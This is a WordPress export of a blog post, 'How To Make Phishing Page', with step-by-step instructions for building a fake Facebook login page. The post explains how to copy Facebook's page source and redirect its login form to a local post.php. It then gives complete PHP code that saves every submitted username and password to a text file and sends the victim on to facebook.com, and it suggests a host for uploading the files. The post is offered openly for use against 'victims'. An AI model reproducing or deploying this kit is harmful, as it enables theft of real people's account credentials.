{"id":1383,"date":"2015-05-11T17:52:34","date_gmt":"2015-05-11T12:22:34","guid":{"rendered":"http:\/\/trickspedia.net\/?p=1383"},"modified":"2015-05-11T17:52:34","modified_gmt":"2015-05-11T12:22:34","slug":"how-to-make-phishing-page","status":"publish","type":"post","link":"https:\/\/trickspedia.net\/how-to-make-phishing-page\/","title":{"rendered":"How To Make Phishing Page"},"content":{"rendered":"<p>phishing:<br \/>\nPhishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail spoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.<\/p>\n<p>today we create a facebook phishing page which look similar to a facebook page but it&#8217;s not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting&#8230;..<\/p>\n<p>FACEBOOK PHISHING&#8230;.<br \/>\nsteps to create a phishing page:<\/p>\n<p>1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.<\/p>\n<p><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" class=\" aligncenter\" src=\"http:\/\/1.bp.blogspot.com\/-WbmplgAwhYY\/T7_GLG8iNkI\/AAAAAAAAACI\/f37cKNytv1k\/s1600\/Untitled.png\" alt=\"\" width=\"743\" height=\"418\" \/><\/p>\n<div><i><b>2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.<\/b><\/i><\/div>\n<div><i><b>3.Now open the notepad and press\u00a0CTRL+F,and type\u00a0ACTION.<\/b><\/i><\/div>\n<div><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" class=\" aligncenter\" src=\"http:\/\/3.bp.blogspot.com\/-_zEzgHp619Q\/T7_HwdTxtMI\/AAAAAAAAACQ\/ljkLzYV42_I\/s1600\/Untitled.png\" alt=\"\" width=\"756\" height=\"425\" \/><\/div>\n<div>\n<div><i><b>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0<\/b><\/i><\/div>\n<div><i><b>4.You will have to find a text which looks like ..<\/b><\/i><\/div>\n<div>\n<h4><i><b>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0<span class=\"webkit-html-attribute-name\"><u>action<\/u><\/span>=<u>&#8220;<\/u><u><span class=\"webkit-html-attribute-value\">https:\/\/www.facebook.com\/login.php?<\/span><span class=\"webkit-html-attribute-value\">login_attempt=1<\/span><\/u>&#8220;<\/b><\/i><\/h4>\n<\/div>\n<div><i><b>5.delete all the text written in red colour and instead of it write post.php.then it will look like&#8230;<\/b><\/i><br \/>\n<i><b><br \/>\n<\/b><\/i><\/div>\n<div><i><b>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0action=&#8221;<u>post.php<\/u>&#8220;<\/b><\/i><\/div>\n<div><i><b>\u00a0<\/b><\/i><\/div>\n<div><i><b>6.Now save it on your desktop with the name\u00a0index.htm,not index.html,remember.<\/b><\/i><\/div>\n<div><i><b>\u00a0<\/b><\/i><\/div>\n<div><i><b>7.Now your phishing page is ready.it will look like a pic given below .<\/b><\/i><\/div>\n<div><img loading=\"lazy\" loading=\"lazy\" decoding=\"async\" class=\" aligncenter\" src=\"http:\/\/2.bp.blogspot.com\/-Nuh_gUtigoc\/T7_KhzOAAtI\/AAAAAAAAACc\/xTm_HxELURw\/s200\/post-99705-1213608003.png\" alt=\"\" width=\"200\" height=\"200\" \/><\/div>\n<div><i><b>8.Open a new notepad and save the given data with the name<u>\u00a0post.php<\/u>.<\/b><\/i><br \/>\n<i><b><br \/>\n<\/b><\/i><i><b>&lt;?php<\/b><\/i><br \/>\n<i><b>header (&#8216;Location:http:\/\/www.facebook.com\/&#8217;);<\/b><\/i><br \/>\n<i><b>$handle = fopen(&#8220;usernames.txt&#8221;, &#8220;a&#8221;);<\/b><\/i><br \/>\n<i><b>foreach($_POST as $variable =&gt; $value) {<\/b><\/i><br \/>\n<i><b>\u00a0 \u00a0fwrite($handle, $variable);<\/b><\/i><br \/>\n<i><b>\u00a0 \u00a0fwrite($handle, &#8220;=&#8221;);<\/b><\/i><br \/>\n<i><b>\u00a0 \u00a0fwrite($handle, $value);<\/b><\/i><br \/>\n<i><b>\u00a0 \u00a0fwrite($handle, &#8220;\\r\\n&#8221;);<\/b><\/i><br \/>\n<i><b>}<\/b><\/i><br \/>\n<i><b>fwrite($handle, &#8220;\\r\\n&#8221;);<\/b><\/i><br \/>\n<i><b>fclose($handle);<\/b><\/i><br \/>\n<i><b>exit;<\/b><\/i><br \/>\n<i><b>?&gt;\u00a0<\/b><\/i><br \/>\n<i><b><br \/>\n<\/b><\/i><i><b>9.You have two files now one is\u00a0index.htm\u00a0and another is\u00a0post.php,remember file extension is important.<\/b><\/i><\/div>\n<\/div>\n<div><i><b>11.I\u00a0prefer u to use <a href=\"http:\/\/Royalclouds.net\" target=\"_blank\" rel=\"noopener\">Royalclouds.net<\/a> \u00a0\u00a0because it will be easy to use.<\/b><\/i><\/div>\n<div><\/div>\n<div>upload files in filemanger and your phishing done<\/div>\n","protected":false},"excerpt":{"rendered":"<p>phishing: Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":4092,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"content-type":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","enabled":false},"version":2}},"categories":[],"tags":[],"class_list":["post-1383","post","type-post","status-publish","format-standard","has-post-thumbnail"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"https:\/\/trickspedia.net\/file\/2017\/09\/download.jpg","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p5GNPb-mj","_links":{"self":[{"href":"https:\/\/trickspedia.net\/rest\/wp\/v2\/posts\/1383","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/trickspedia.net\/rest\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/trickspedia.net\/rest\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/trickspedia.net\/rest\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/trickspedia.net\/rest\/wp\/v2\/comments?post=1383"}],"version-history":[{"count":0,"href":"https:\/\/trickspedia.net\/rest\/wp\/v2\/posts\/1383\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/trickspedia.net\/rest\/wp\/v2\/media\/4092"}],"wp:attachment":[{"href":"https:\/\/trickspedia.net\/rest\/wp\/v2\/media?parent=1383"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/trickspedia.net\/rest\/wp\/v2\/categories?post=1383"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/trickspedia.net\/rest\/wp\/v2\/tags?post=1383"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}